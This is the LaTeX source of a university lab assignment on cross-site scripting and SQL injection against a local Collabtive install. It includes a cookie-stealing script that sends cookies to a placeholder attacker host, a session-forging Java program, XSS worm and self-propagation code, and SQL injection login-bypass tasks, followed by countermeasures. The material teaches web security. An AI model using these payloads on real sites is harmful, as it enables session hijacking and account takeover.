\input{header}

\begin{document}

\begin{center}
{\LARGE CS 577 Cybersecurity Lab}
\vspace{0.1in}\\
{\Large Lab 5 – due 10/16/14 6:16pm}
\vspace{0.1in}\\

{\Large Georgios Portokalidis - Stevens Institute of Technology}
\end{center}

\section*{Cross-Site Scripting (XSS) and SQL Injection Attacks}

This assignment will familiarize you with Cross-Site Scripting (XSS) and SQL Injection Attacks. To demonstrate what attackers can do by exploiting XSS vulnerabilities or performing SQL-Injection attacks, a web-based project management software named 
{\tt Collabtive} was installed.  
\vspace{0.1in}\\


\section*{Lab Environment}


\newcommand{\urlorurls}{URL }
\newcommand{\urlisorurlsare}{URL is }


%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%% Part I of the environment setup
\input{Web_Environment_PartI}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


\vspace{0.1in}
\begin{tabular}{|l|l|l|}
\hline
URL & Description & Directory\\
\hline
\url{http://www.xsslabcollabtive.com} & Collabtive & {\tt
/var/www/XSS/Collabtive/} \\
\hline
\end{tabular}
\vspace{0.1in}

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%% Part II of the environment setup
\input{Web_Environment_PartII}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


\subsection*{Turn Off the Countermeasure}
PHP provides a mechanism to automatically defend against
SQL injection attacks. The method is called magic quote, and more
details will be introduced in Task 3. Let us turn off this 
protection first (this protection method is 
deprecated after PHP version 5.3.0). 
\begin{enumerate}
\item Go to \url{/etc/php5/apache2/php.ini}.
\item Find the line: {\tt magic\_quotes\_gpc = On}. 
\item Change it to this: {\tt magic\_quotes\_gpc = Off}. 
\item Restart the Apache server by running
{\tt "sudo service apache2 restart"}. 
\end{enumerate}



\section*{Task 1: Stealing Cookies from the Victim's Machine (10\%)}

In this task, the attacker wants the JavaScript code 
to send the cookies to himself/herself.
To achieve this, the malicious JavaScript code needs to 
send an HTTP request to the attacker, with the cookies appended to 
the request.

We can do this by having the malicious JavaScript insert an {\tt $<$img$>$} tag with
its {\tt src} attribute set to the attacker's machine.  When the JavaScript inserts
the {\tt img} tag, the browser tries to load the image from the URL in
the {\tt src} field; this results in an HTTP GET request sent to the attacker's
machine. 

Write a JavaScript that sends the cookies to the port 5555 of the
attacker's machine, where the attacker has a TCP server listening 
to the same port. The server can print out whatever it receives. 
The TCP server program is available from the lab's web site.


{\footnotesize
\begin{Verbatim}[frame=single] 
 <script>document.write('<img src=http://attacker_IP_address:5555?c=' 
                                  + escape(document.cookie) + '   >'); 
 </script> 
\end{Verbatim}
}


\subsection*{Task 1.2: Session Hijacking using the Stolen Cookies (15\%)}

After stealing the victim's cookies, the attacker can do whatever the victim
can do to the {\tt Collabtive} web server, including creating a new project 
on behalf of the victim, deleting the victim's post, etc. Essentially, 
the attack has hijacked the victim's session. 
In this task, we will launch this session hijacking attack, and
write a program to create a new project on behalf of the victim. 
The attack should be launched from another virtual machine.


To forge a project, we should first find out how a legitimate 
user creates a project in {\tt Collabtive}.
More specifically, we need to figure out what are sent to the server when a user 
creates a project. Firefox's {\tt LiveHTTPHeaders} extension can help us; it 
can display the contents of any HTTP request message sent 
from the browser. From the contents, we can identify all
the parameters in the request. A screen shot of {\tt LiveHTTPHeaders} is given in
Figure\ref{fig:livehttptext}. The {\tt LiveHTTPHeaders} 
is already installed in the pre-built \ubuntu VM image.


Once we have understood what the HTTP request for project creation
looks like, we can write a Java program to send out the 
same HTTP request. The {\tt Collabtive} server cannot distinguish whether 
the request is sent out by the user's browser or by the attacker's
Java program. As long as we set all the parameters correctly,
and the session cookie is attached, the server will accept and process the 
project-posting HTTP request.
To simplify your task, we provide you with a sample java program that does the 
following:

\begin{enumerate}
\item Open a connection to web server.
\item Set the necessary HTTP header information.
\item Send the request to web server.
\item Get the response from web server. 
\end{enumerate}

{\footnotesize
\begin{Verbatim}[frame=single]
import java.io.*;
import java.net.*;

public class HTTPSimpleForge {

   public static void main(String[] args) throws IOException {
   try {
	int responseCode;
	InputStream responseIn=null;
	
	// URL to be forged.
	URL url = new URL ("http://victim_IP_address/collabtive/
						admin.php?action=addpro");
	
	// URLConnection instance is created to further parameterize a 
	// resource request past what the state members of URL instance 
	// can represent.
	URLConnection urlConn = url.openConnection();
	if (urlConn instanceof HttpURLConnection) {
		urlConn.setConnectTimeout(60000);
		urlConn.setReadTimeout(90000);
	}
		
	// addRequestProperty method is used to add HTTP Header Information.
	// Here we add User-Agent HTTP header to the forged HTTP packet.
        // Add other necessary HTTP Headers yourself. Cookies should be stolen
	// using the method in task3.
	urlConn.addRequestProperty("User-agent","Sun JDK 1.6");
	
	//HTTP Post Data which includes the information to be sent to the server.
	String data="name=test&desc=test...&assignto[]=...&assignme=1";
		
	// DoOutput flag of URL Connection should be set to true 
	// to send HTTP POST message.
	urlConn.setDoOutput(true);
		
	// OutputStreamWriter is used to write the HTTP POST data 
	// to the url connection.        	
        OutputStreamWriter wr = new OutputStreamWriter(urlConn.getOutputStream());
        wr.write(data);
        wr.flush();

	// HttpURLConnection a subclass of URLConnection is returned by 
	// url.openConnection() since the url  is an http request.			
	if (urlConn instanceof HttpURLConnection) {
		HttpURLConnection httpConn = (HttpURLConnection) urlConn;
		
		// Contacts the web server and gets the status code from 
		// HTTP Response message.
		responseCode = httpConn.getResponseCode();
		System.out.println("Response Code = " + responseCode);
	
		// HTTP status code HTTP_OK means the response was 
		// received sucessfully.
		if (responseCode == HttpURLConnection.HTTP_OK) {

			// Get the input stream from url connection object.
			responseIn = urlConn.getInputStream();
			
			// Create an instance for BufferedReader 
			// to read the response line by line.
			BufferedReader buf_inp = new BufferedReader(
					new InputStreamReader(responseIn));
			String inputLine;
			while((inputLine = buf_inp.readLine())!=null) {
				System.out.println(inputLine);
			}
		}
	}
     } catch (MalformedURLException e) {
		e.printStackTrace();
     }
   }
}
\end{Verbatim}
}

If you have trouble understanding the above program, 
we suggest you to read the following:

\begin{itemize}
\item JDK 6 Documentation: \url{http://java.sun.com/javase/6/docs/api/}
\item Java Protocol Handler:\\ 
\url{http://java.sun.com/developer/onlineTraining/protocolhandlers/}
\end{itemize}


\section*{Task 2: Writing an XSS Worm (25\%)}

In this and next task, we will perform an attack similar to what Samy did 
to MySpace in 2005 (i.e. the Samy Worm). First, we will write an XSS 
worm that does not self-propagate; in the next task, we will make it 
self-propagating.
From the previous task, we have learned how to steal the cookies from the victim 
and then forge---from the attacker's machine---HTTP requests using the stolen cookies.
In this task, we need to write a malicious JavaScript program that forges HTTP requests 
directly from the victim's browser, without the intervention of 
the attacker.  The objective of the attack is to modify the victim's 
profile.


\paragraph{Guideline 1: Using Ajax.} The malicious JavaScript should be able to 
send an HTTP request to the {\tt Collabtive} server, asking it to modify
the current user's profile. There are two common types of HTTP requests, 
one is HTTP {\tt GET} request,
and the other is HTTP {\tt POST} request. These two types of HTTP requests
differ in how they send the contents of the request to the server. 
In {\tt Collabtive}, the request for modifying profile uses HTTP {\tt POST}
request. We can use the {\tt XMLHttpRequest} object to send 
HTTP {\tt GET} and {\tt POST} requests to web applications. 

To learn how to use {\tt XMLHttpRequest}, you can 
study these cited documents~\cite{ajaxnoobs,ajaxpostit}. 
If you are not familiar with JavaScript programming, we 
suggest that you read ~\cite{javascripttutorial} to learn some basic JavaScript
functions. You will have to use some of these functions.


\paragraph{Guideline 2: Code Skeleton.} We provide a skeleton of the JavaScript code 
that you need to write. You need to fill in all the necessary details.
When you store the final JavaScript code as a worm in the standalone file,
you need to remove all the comments, extra space, new-line characters, {\tt <script>}
and {\tt </script>}.

{\footnotesize
\begin{Verbatim}[frame=single] 
<script>
var Ajax=null;

// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabcollabtive.com/manageuser.php?action=edit",true);
Ajax.setRequestHeader("Host","www.xsslabcollabtive.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");


// Construct the content. The format of the content can be learned 
// from LiveHTTPHeaders.
var content="name=...&company=&..."; // You need to fill in the details.

// Send the HTTP POST request.
Ajax.send(content);
</script>
\end{Verbatim} 
} 


You may also need to debug your JavaScript code. 
{\tt Firebug} is a Firefox extension that helps you debug JavaScript code. 
It can point you to the precise places that contain errors. 
It is already installed in our pre-built \ubuntu VM image.
After finishing this task, change the "Content-Type" to "multipart/form-data" 
as in the original HTTP request. Repeat your attack, and describe your observation. 

\paragraph{Guideline 3: Getting the user name.}
To modify the victim's profile, the HTTP requests sent from the worm
should contain the victim's name, so the worm needs
to find out this information. The name is actually 
displayed in the web page, but it is fetched using
JavaScript code. We can use the same code to get the name.

%It is required because of the UNIQUE constraint on field "name" in collabtive's
%database table.  If a static username is used in the malicious JavaScript, this
%attack can only succeed once.  After that, because of the UNIQUE constraint,
%the request will be rejected by the server. To solve this, 

{\tt Collabtive} uses the {\tt PeriodicalUpdate} function to update the online 
user information. An example using {\tt PeriodicalUpdate} 
is given below. This code displays the reply from the server, and
the name of the current user is contained in the reply.
In order to retrieve the name from the reply, you may need to learn some string
operations in JavaScript.  You should study this cited
tutorial~\cite{Javascriptstring}.

{\footnotesize
\begin{Verbatim}[frame=single]
<script>var on=new Ajax.PeriodicalUpdater("onlinelist",
"manageuser.php?action=onlinelist",
{method:'get',onSuccess:function(transport){alert(transport.responseText);},
frequence:1000})</script>
\end{Verbatim}
}


\paragraph{Guideline 4: Be careful when dealing with an infected profile.}
Sometimes, a profile is already infected by the XSS worm, you may want to
leave them alone, instead of modifying them again. If you are not careful, 
you may end up removing the XSS worm from the profile. 


%\paragraph{Guideline 5: Testing.}
%For {\tt Collabtive}, you can view others' profiles only if you are the administrator or you are 
%assigned to the same project. Test your attack under the following steps:
%
%\begin{enumerate}
%   \item Add a new project in {\tt Collabtive}. Assign it to at least three persons. 
%   \item Choose one of them as the attacker and include the worm into his or her profile. 
%   \item Log on as victim A, view attacker's profile. Check if A's profile is infected. This is 
%to test if the HTTP request succeeds.
%   \item Log on as victim B, view A's profile. Check if B's profile is injected. This is to test
%if the worm can propagate itself.
%\end{enumerate}



\subsection*{Bonus: Writing a Self-Propagating XSS Worm (10\%)}

To become a real worm, the malicious JavaScript program should be able to propagate itself.
Namely, whenever some people view an infected profile, 
not only will their profiles be modified, the worm will also be 
propagated to their profiles, further affecting others who view these newly infected profiles.
This way, the more people view the infected profiles, the faster the worm can propagate. 
This is the exactly the same mechanism used by the Samy Worm: 
within just 20 hours of its October 4, 2005 release, over one million users 
are affected, making Samy one of the fastest spreading viruses of all time.
The JavaScript code that can achieve this is called 
a {\em self-propagating cross-site scripting worm}. In this task, you need to 
implement such a worm.

To achieve self-propagation, when the malicious JavaScript modifies the victim's profile,
it should copy itself to the victim's profile. There are several 
approaches to achieve this, and we will discuss two common approaches:

\begin{itemize}
\item If the entire JavaScript program (i.e., the worm) is 
    embedded in the infected profile, 
    to propagate the worm to another profile, the worm code can use
    DOM APIs to retrieve a copy of itself from the web page.
    An example of using DOM APIs is given below. This code
    gets a copy of itself, and display it in an alert window:

{\footnotesize
\begin{Verbatim}[frame=single]
<script id=worm>
   var strCode = document.getElementById("worm");
   alert(strCode.innerHTML);
</script>
\end{Verbatim}
}

\item If the worm is included using the {\tt src} attribute in the {\tt <script>} tag,
writing self-propagating worms is much easier. 
We have discussed the {\tt src} attribute in Task 1, and an example
is giving below. The worm can simply copy the following
{\tt <script>} tag to the victim's profile, essentially
infecting the profile with the same worm.

\begin{Verbatim}
<script type='text\javascript' src='http://example.com/xss_worm.js'>
</script>
\end{Verbatim} 

\end{itemize}


 
\paragraph{Guideline: URL Encoding.}
All messages transmitted using HTTP over the Internet use URL Encoding, 
which converts all non-ASCII characters such as space to special code 
under the URL encoding scheme. 
In the worm code, messages sent to {\tt Collabtive} 
should be encoded using URL encoding. The \texttt{escape} function
can be used to URL encode a string. An example of using the encode
function is given below.

{\footnotesize
\begin{Verbatim}[frame=single]
<script>
  var strSample = "Hello World";
  var urlEncSample = escape(strSample);
  alert(urlEncSample);
</script>
\end{Verbatim}
}

Under the URL encoding scheme 
the "+" symbol is used to denote space. In JavaScript programs, 
"+" is used for both arithmetic operations and string operations. 
To avoid this ambiguity, you may user the {\tt concat} function for string concatenation,
and avoid using addition. For the worm code in the exercise, you don't have to use additions.
If you do have to add a number (e.g a+5), you can use subtraction (e.g a-(-5)).



\section*{Task 3.1: SQL Injection Attack on {\tt SELECT} Statements (10\%)}

In this task, you need to manage to log into {\tt Collabtive}
at \url{www.sqllabcollabtive.com}, without providing a password. 
You can achieve this using SQL injections.
Normally, before users start using {\tt Collabtive}, they need to 
login using their user names and passwords. 
{\tt Collabtive} displays a login window to users and ask them to 
input {\tt username} and {\tt password}.  The login window is 
displayed in the following:



%\begin{figure}[htb]
%    \centerline{\epsfig{figure=Figs/Task1-username.png}} 
%    \caption{The login window}
%    \label{fig:username}
%\end{figure} 

The authentication is implemented by {\tt include/class.user.php} in the
Collabtive root directory (i.e., {\tt /var/www/SQL/Collabtive/}).
It uses the user-provided data to find out whether 
they match with the {\tt username} and {\tt user\_password} fields of any record 
in the database. If there is a match, it means the user has provided a correct 
username and password combination, and should be allowed to login.
Like most web applications, PHP programs interact with their back-end databases using the 
standard SQL language. In {\tt Collabtive}, the following SQL query is 
constructed in {\tt class.user.php} to authenticate users:
\begin{Verbatim}[frame=single]
  $sel1 = mysql_query ("SELECT ID, name, locale, lastlogin, gender, 
     FROM  USERS_TABLE 
     WHERE (name = '$user' OR email = '$user') AND pass = '$pass'");

  $chk = mysql_fetch_array($sel1);

  if (found one record)
  then {allow the user to login}
\end{Verbatim}

In the above SQL statement, the {\tt USERS\_TABLE} is a macro in PHP, and 
will be replaced by the users table named {\tt user}. 
The variable {\tt \$user} holds the string typed in the {\tt Username} textbox, 
and {\tt \$pass} holds the string typed in the {\tt Password} textbox. 
User's inputs in these two textboxs are 
placed directly in the SQL query string. 

\paragraph{SQL Injection Attacks on Login:}
There is a SQL-injection vulnerability 
in the above query. Can you take advantage of this vulnerability to 
achieve the following objectives?

\begin{itemize}
\item {\bf Task 1.1}: Can you log into another person's account without knowing the 
      correct password? 

\item {\bf Task 1.2}:  Can you find a way to modify the database (still using the above SQL
query)?  For example, can you add a new account to the database, or delete an 
existing user account? Obviously, the above SQL statement is a query-only
statement, and cannot update the database. However, using SQL injection,
you can turn the above statement into two statements, with the second one
being the update statement. Please try this method, and see whether you can
successfully update the database.

To be honest, we are unable to achieve the update goal. This is because of
a particular defense mechanism implemented in MySQL. In the report, you should show us what you
have tried in order to modify the database. You should find out why the
attack fails, what mechanism in MySQL has prevented such an attack. You may
look up evidences (second-hand) from the Internet to support your conclusion. 
However, a first-hand evidence will get more points (use your own
creativity to find out first-hand evidences).
If in case you find ways to succeed in the attacks,
you will be awarded bonus points.
\end{itemize}



\subsection*{Task 3.2: SQL Injection on {\tt UPDATE} Statements (15\%)}

In this task, you need to make an unauthorized modification to the 
database. Your goal is to modify another user's profile using 
SQL injections.
In {\tt Collabtive}, if users want to update their profiles, they can go to
{\tt My account}, click the {\tt Edit} link, and then fill out a form to update the profile
information. After the user sends the update request to the server,
an {\tt UPDATE} SQL statement will be constructed
in \url{include/class.user.php}.  The objective of this statement is
to modify the current user's profile information in the \url{users}
table. There is a SQL injection vulnerability in this SQL statement. 
Please find the vulnerability,
and then use it to do the following:

\begin{itemize}
\item Change another user's profile without knowing his/her password. 
For example, if you are logged in as Alice, your goal is to use the 
vulnerability to modify Ted's profile information, including Ted's 
password. After the attack, you should be able to log into Ted's account.
%To make this attack work, you need to set username to Ted,
%and apply {\tt sha1} function to the new password string.
\end{itemize}



\section*{Task 4: Countermeasures (10\%)}

The fundamental problem of SQL injection vulnerability is the failure of 
separating code from data. When constructing a SQL statement, the 
program (e.g. PHP program)
knows what part is data and what part is code. Unfortunately, when 
the SQL statement is sent to the database, the boundary has disappeared;
the boundaries that the SQL interpreter sees may be different from the original
boundaries, if code are injected into the data field. 
To solve this problem, it is important to ensure that the view of 
the boundaries are consistent in the server-side code and in the database. 
There are various ways to achieve this: 
this objective.

\begin{itemize}

\item {\bf Task 3.1: Escaping Special Characters using {\tt magic\_quotes\_gpc}.}  
In the PHP code, if a data variable is the string type, it needs to be enclosed within
a pair of single quote symbols ('). For example, in the SQL query
listed above, we see  {\tt name = '\$user'}. The single quote 
symbol surrounding {\tt \$user} basically ``tries'' to separate the 
data in the {\tt \$user} variable from the code. Unfortunately,
this separation will fail if the contents of {\tt \$user} 
include any single quote. Therefore, we need a mechanism to tell the
database that a single quote in {\tt \$user} should be treated as 
part of the data, not as a special character in SQL. All we need to 
do is to add a backslash~($\backslash$) before the single quote. 

PHP provides a mechanism to automatically add a backslash before 
single-quote ('), double quote ({\tt "}), backslash ($\backslash$), 
and NULL characters. If this option is turned on, all these characters 
in the inputs from the users will be automatically escaped. To turn
on this option, go to \url{/etc/php5/apache2/php.ini}, and add
{\tt magic\_quotes\_gpc = On} (the option is already on in the VM provided
to you). Remember, if you update {\tt php.ini}, you need to 
restart the Apache server by running {\tt "sudo service apache2 restart"}; 
otherwise, your change will not take effect.

Please turn on/off the magic quote mechanism, and see how it help the protection. 
Please be noted that starting from PHP 5.3.0 (the version in our provided VM is
5.3.5), the feature has been DEPRECATE\footnote{In the process of authoring computer
software, its standards or documentation, {\tt deprecation} is a status applied
to software features to indicate that they should be avoided, typically because
they have been superseded. Although deprecated features remain in the software,
their use may raise warning messages recommending alternative practices, and deprecation may
indicate that the feature will be removed in the future. Feature are deprecated-
rather than immediately removed-in order to provide backward compatibility, and
give programmers who have used the feature time to bring their code into 
compliance with the new standard.}, due to several reasons:
\begin{itemize}
\item Portability: Assuming it to be on, or off, affects portability.
Most code has to use a function called {\tt get\_magic\_quotes\_gpc()} to check for this, 
and code accordingly.

\item Performance and Inconvenience: not all user inputs are used 
for SQL queries, so mandatory escaping all data not only affects 
performance, but also become annoying when some data are not 
supposed to be escaped.
\end{itemize}




\item {\bf Task 3.2: Escaping Special Characters using 
{\tt mysql\_real\_escape\_string}}.
A better way to escape data to defend against SQL injection is to
use database specific escaping mechanisms, instead of relying
upon features like magical quotes. MySQL provides an escaping mechanism,
called {\tt mysql\_real\_escape\_string()}, 
which prepends backslashes to a few special characters, including
{\tt $\backslash$x00, $\backslash$n, $\backslash$r, $\backslash$, ', "} 
and {\tt $\backslash$x1A}.
Please use this function to fix the SQL injection vulnerabilities 
identified in the previous tasks. You should disable the other 
protection schemes described in the previous tasks before 
working on this task.

%\item {\bf Task 3.2: Integer.}
%If a variable is of an integer type, the above escaping method will not
%work, because the SQL statement will be ...


\item {\bf Task 3.3: Prepare Statement.} 
A more general solution to separating data from SQL logic is to tell 
the database exactly which part is the data part and which part is 
the logic part. MySQL provides the prepare statement mechanism 
for this purpose. 

%\begin{Verbatim}[frame=single] 
\begin{verbatim}
$db = new mysqli("localhost", "user", "pass", "db");
$stmt = $db->prepare("SELECT ID, name, locale, lastlogin FROM users 
                      WHERE name=? AND age=?");
$stmt->bind_param("si", $user, $age);
$stmt->execute();

//The following two functions are only useful for SELECT statements
$stmt->bind_result($bind_ID, $bind_name, $bind_locale, $bind_lastlogin);
$chk=$stmt->fetch();
\end{verbatim}
%\end{Verbatim}

Parameters for the {\tt new mysqli()} function can be found in {\tt /config/standard/config.php}.
Using the prepare statement mechanism, we divide the process of sending
a SQL statement to the database into two steps.  
The first step is to send the code, i.e., the SQL statement without 
the data that need to be plugged in later. This is the prepare step. 
After this step, we then send the data to the database using {\tt bind\_param()}. 
The database will treat everything sent in this step only as 
data, not as code anymore. If it's a {\tt SELECT} statement, we need to bind
variables to a prepared statement for result storage, and then fetch the results
into the bound variables.


Please use the prepare statement mechanism to fix the SQL injection vulnerability
in the {\tt Collabtive} code. 
In the {\tt bind\_param} function, the first argument {\tt "si"} means
that the first parameter ({\tt \$user}) has a string type, and the 
second parameter ({\tt \$age}) has an integer type.

\end{itemize}



\section{Guidelines}

\paragraph{Print out debugging information.} 
When we debug traditional programs (e.g. C programs) without using 
any debugging tool, we often use {\tt printf()} to print out some debugging 
information. In web applications, whatever are printed out by the server-side
program is actually
displayed in the web page sent to the users; the debugging
printout may mess up with the web page. There are several ways to
solve this problem. A simple way is to print out all the information
to a file. For example, the following code snippet can be used by the
server-side PHP program to print out the value of a variable to a file.  
\begin{verbatim}
  $myFile = "/tmp/mylog.txt";
  $fh = fopen($myFile, 'a') or die("can't open file");
  $Data = "a string";
  fwrite($fh, $Data . "\n");
  fclose($fh);
\end{verbatim} 

\paragraph{A useful Firefox Add-on.}
Firefox has an add-on called {\tt "Tamper Data"}, it allows you to modify 
each field in the HTTP request before the request is sent to the server. 
For example, after clicking a button on a web page, an HTTP request will be
generated. However, before it is sent out, the {\tt "Tamper Data"} add-on
intercepts the request, and gives you a chance to make an arbitrary 
change on the request. This tool is quite handy in this lab. 

The add-on only works for Firefox versions 3.5 and above. If your 
Firefox has an earlier version, you need to upgrade it
for this add-on. In our most recently built virtual machine 
image (SEEDUbuntu11.04-Aug-2011), Firefox is already upgraded to 
version 5.0, and the {\tt "Tamper Data"} add-on is already 
installed.





\section{Submission}

You need to submit a detailed lab report to describe what you have
done and what you have observed. Please provide details using  
{\tt LiveHTTPHeaders},  {\tt Wireshark}, and/or screenshots.
You also need to provide explanation
to the observations that are interesting or surprising.



\begin{thebibliography}{10}

\bibitem{ajaxnoobs}
\newblock AJAX for n00bs.
\newblock Available at the following URL:\\
{\footnotesize \url{http://www.hunlock.com/blogs/AJAX_for_n00bs}}.

\bibitem{ajaxpostit}
\newblock AJAX POST-It Notes.
\newblock Available at the following URL:\\
{\footnotesize \url{http://www.hunlock.com/blogs/AJAX_POST-It_Notes}}.

\bibitem{javascripttutorial}
\newblock Essential Javascript -- A Javascript Tutorial.
\newblock Available at the following URL:\\
{\footnotesize \url{http://www.hunlock.com/blogs/Essential_Javascript_--_A_Javascript_Tutorial}}.

\bibitem{Javascriptstring}
\newblock The Complete Javascript Strings Reference.
\newblock Available at the following URL:\\
{\footnotesize \url{http://www.hunlock.com/blogs/The_Complete_Javascript_Strings_Reference}}.

\bibitem{samy}
\newblock Technical explanation of The MySpace Worm.
\newblock Available at URL: \url{http://namb.la/popular/tech.html}.


\bibitem{collabtive}
\newblock Web Based Project Management With Collabtive On Ubuntu 7.10 Server.
\newblock \url{http://howtoforge.com/web-based-project-management-with-collabtive-on-ubuntu7.10-server}.


\end{thebibliography}









%\begin{figure}
%   \includegraphics[scale=1.0]{Figs/livehttptext.eps}
%   \label{fig:livehttptext}
%   \caption{Screenshot of LiveHTTPHeaders Extension} 
%\end{figure}

%\begin{figure}[t]
%\par
%\centerline{\psfig{figure=Figs/livehttptext.eps,width=6.0in}}
%\caption{Screenshot of {\tt LiveHTTPHeaders} Extension} 
%\label{fig:livehttptext}
%\end{figure}
\begin{figure}[b]
{\footnotesize
\begin{Verbatim}[frame=single]
http://victim_IP_address/collabtive/admin.php?action=addpro

POST /admin.php?action=addpro HTTP/1.1
Host: victim_IP_address
User-Agent: Mozilla/5.0 (X11;  Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://victim_IP_address/collabtive/index.php
Cookie: PHPSESSID=......
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
name=<Content of the message>



HTTP/1.1 302 Found
Date: Fri, 22 Jul 2011 19:43:15 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: 0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 26
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
\end{Verbatim}
}
\caption{Screenshot of {\tt LiveHTTPHeaders} Extension} 
\label{fig:livehttptext}
\end{figure}
\end{document}
